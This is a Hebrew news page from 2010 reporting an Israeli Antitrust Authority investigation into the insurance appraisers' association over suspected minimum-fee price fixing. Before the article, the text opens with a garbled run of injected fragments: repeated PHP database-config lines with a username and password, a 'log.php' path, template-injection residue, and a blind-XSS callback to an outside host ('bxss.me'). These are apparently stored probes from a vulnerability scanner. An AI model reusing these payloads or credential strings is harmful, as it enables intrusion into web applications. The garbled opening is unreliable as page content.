$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> רשות ההגבלים פתחה בחקירה נגד איגוד שמאי הביטוח בחשד לעשיית הסדר כובל
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

נפתחה חקירה נגד איגוד שמאי הביטוח בחשד לעשיית קרטל

תאריך: 29/08/2010 12:37   מחבר: מערכת האתר

שמאי הביטוח מתלוננים ואולי בצדק מבחינתם כי חברות הביטוח לא משלמות להם שכר טרחה ראוי וכתוצאה מכך חלה שחיקה מהותית ברמת ההכנסה שלהם. לפני כשנה פרסם משרד הביטחון מכרז לשמאי רכב. ספר המכרז נשלח לאיגוד שמאי הביטוח המייצג את השמאים. תנאי המכרז נבחנו וראשי האיגוד הגיעו למסקנה כי שכר הטרחה המוצע במסגרת המכרז אינו סביר ולא משתלם להם לקחת חלק במכרז.

כאשר נכנסים למצוקה כלכלית ברמה האישית ו/או התאגידית מנסים למצוא פתרונות יצירתיים ליציאה מהסבך אליו נקלעים. לא תמיד הפתרונות עולים בקנה אחד עם הוראות החוק. לעניין זה הוראות החוק הרלבנטי הוא חוק ההגבלים העסקיים. רשות ההגבלים הפועלת כזרוע אכיפה מכוחו של החוק אמורה להילחם בתופעת הקרטלים, המיזוגים והמונופולים שפועלים בניגוד לחוק, פוגעים בתחרות ובציבור הלקוחות, התלוי בשירות ובמוצר.

כך קרה עם איגוד שמאי הביטוח. בחודש ספטמבר 2009 פתחה מחלקת החקירות של הרשות בחקירה כנגד איגוד שמאי הביטוח בחשד למתן הנחייה לשמאים החברים באיגוד לקבוע מחירי מינימום לשירותים הניתנים על ידם. בעצם קביעת מחיר מינימום שמתחתיו לא יורדים נדרש השמאי להציע שכר טרחה שהוא למעשה תוצאה של תיאום מחירים בהנחיית הנהלת האיגוד. הנחייה שכזו יש בה כדי להקים את החשד לעשיית הסדר כובל.

קביעת מחיר מינימום מוסכם על השמאים החברים באיגוד, מונע מהם להתחרות באופן חופשי אל מול הלקוחות, ואלו מצדם, לא רואים טעם לכתת רגליהם בין השמאים האחרים כדי לקבל הצעת מחיר טובה יותר ונמוכה ממחיר המינימום שהוסכם עליו.  שהרי, אם השמאים יצייתו להנחיה של האיגוד, אזי, כל שמאי יציע את אותו מחיר מינימום ללקוח שפונה אליו. זהו החסם שאותו אסור לעבור במסגרת ההסדר הלא חוקי לכאורה שקבע האיגוד, כנטען על ידי הרשות להגבלים עסקיים.

בעקבות הפרסום בדבר הפתיחה בחקירה, מסר האיגוד בתגובה לפניית "גלובס", כי לעיתים קיימת פנייה של חברי האיגוד להנהלה כדי להרכיב טבלת שכר טרחה ותמיד קמה התנגדות ליוזמה. עוד הוסיפו כי מעולם לא נעשה שום צעד בניגוד להוראות חוק ההגבלים העסקיים". זו התגובה. נמתין לסיום תוצאות החקירה ונדווח עליהן.